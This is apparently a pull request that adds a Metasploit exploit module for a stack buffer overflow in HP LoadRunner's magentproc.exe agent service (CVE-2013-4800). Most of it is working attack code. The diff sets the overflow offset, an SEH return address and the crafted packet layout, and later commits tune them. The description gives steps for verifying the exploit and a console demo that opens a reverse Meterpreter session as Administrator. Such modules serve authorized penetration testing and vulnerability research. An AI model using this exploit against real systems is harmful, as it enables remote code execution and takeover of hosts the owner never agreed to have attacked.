### PR TITLE
Add module for ZDI-13-169

### DIFF
--- a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
+++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
@@ -1,0 +1,82 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HP LoadRunner magentproc.exe Overflow',
+      'Description'    => %q{
+        This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The
+        vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending
+        a specially crafted packet, an attacker may be able to execute arbitrary code.
+      },
+      'Author'         =>
+        [
+          'Unknown', # Original discovery # From Tenable Network Security
+          'juan vazquez' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2013-4800'],
+          ['OSVDB', '95644'],
+          ['http://www.zerodayinitiative.com/advisories/ZDI-13-169/']
+        ],
+      'Privileged'     => false,
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'seh',
+          'SSL' => true,
+          'SSLVersion' => 'SSL3'
+        },
+      'Payload'        =>
+        {
+          'Space'    => 5724, # without rop chain
+          'StackAdjustment' => -3500,
+          'BadChars' => "\x00"
+        },
+      'Platform'       => 'win',
+      'DefaultTarget'  => 0,
+      'Targets'        =>
+        [
+          [
+            'Windows XP SP3 / HP LoadRunner 11.50',
+            {
+              # magentproc.exe 11.0.0.1002
+              'Offset' => 1104,
+              'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates
+              'Crash' => 10000 # Length needed to ensure an exception
+            }
+          ]
+        ],
+      'DisclosureDate' => 'Jul 27 2013'))
+
+      register_options([Opt::RPORT(443)], self.class)
+  end
+
+  def exploit
+
+    req = [0xffffffff].pack("N") # Fake Length
+    req << rand_text(target['Offset'])
+    req << generate_seh_record(target.ret)
+    req << payload.encoded
+    req << rand_text(target['Crash'])
+
+    connect
+    print_status("sending 1")
+    sock.put(req)
+    disconnect
+
+  end
+end

--- a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
+++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
@@ -36,15 +36,16 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'seh',
           'SSL' => true,
-          'SSLVersion' => 'SSL3'
+          'SSLVersion' => 'SSL3',
+          'PrependMigrate' => true
         },
       'Payload'        =>
         {
-          'Space'    => 5724, # without rop chain
-          'StackAdjustment' => -3500,
-          'BadChars' => "\x00"
+          'Space'    => 4096,
+          'DisableNops' => true,
+          'BadChars' => "\x00",
+          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
         },
       'Platform'       => 'win',
       'DefaultTarget'  => 0,
@@ -56,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
               # magentproc.exe 11.0.0.1002
               'Offset' => 1104,
               'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates
-              'Crash' => 10000 # Length needed to ensure an exception
+              'Crash' => 6000 # Length needed to ensure an exception
             }
           ]
         ],
@@ -74,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
     req << rand_text(target['Crash'])
 
     connect
-    print_status("sending 1")
+    print_status("Sending malicious request...")
     sock.put(req)
     disconnect
 

--- a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
+++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [
             'Windows XP SP3 / HP LoadRunner 11.50',
             {
-              # magentproc.exe 11.0.0.1002
+              # magentproc.exe 11.50.2042.0
               'Offset' => 1104,
               'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates
               'Crash' => 6000 # Length needed to ensure an exception


### PR DESCRIPTION
Tested successfully on HP LoadRunner 11.50 / Windows XP SP3. I have not been able to exploit reliably on other Windows versions due to memory protections. Maybe someone would like to give a chance. Windows XP SP3 is still a supported platform for HP LoadRunner. Maybe still could be possible to exploit on other platforms, but I don't spot how to make it reliable. And don't want the reversing time invested to get the vulnerability so here it is.

Verification
- [x] Install Windows XP SP3
- [x] Install Windows HP LoadRunner 11.50. Can be downloaded from https://h20575.www2.hp.com/evalportal/displayProductsList.do?prdcenter=HPSS_PC&lang=en&cc=us&hpappid=PDAPI_PRMO_PRO2_EVAL&applandingpage2=HTTPS://h20575.www2.hp.com/evalportal/displayProductsList.do?prdcenter=HPSS_PC&hppev_userid=hp_sec&hpp_r_m=false
- [x] Verify the version of magentproc.exe (the vulnerable service), should be 11.50.2042.0, if it isn't ask me for the HP LoadRunner installer
- [x] Run the "Agent Process". It is accessible from the Start Menu.
- [x] Run msfconsole and run the exploit against the target, hopefully get a session :)

See the demo:

```
msf > use exploit/windows/misc/hp_loadrunner_magentproc 
rexploitmsf exploit(hp_loadrunner_magentproc) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Sending malicious request...
[*] Sending stage (770048 bytes) to 192.168.172.244
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.244:1033) at 2013-10-03 22:15:02 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
eComputer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 2 closed.  Reason: User exit

```
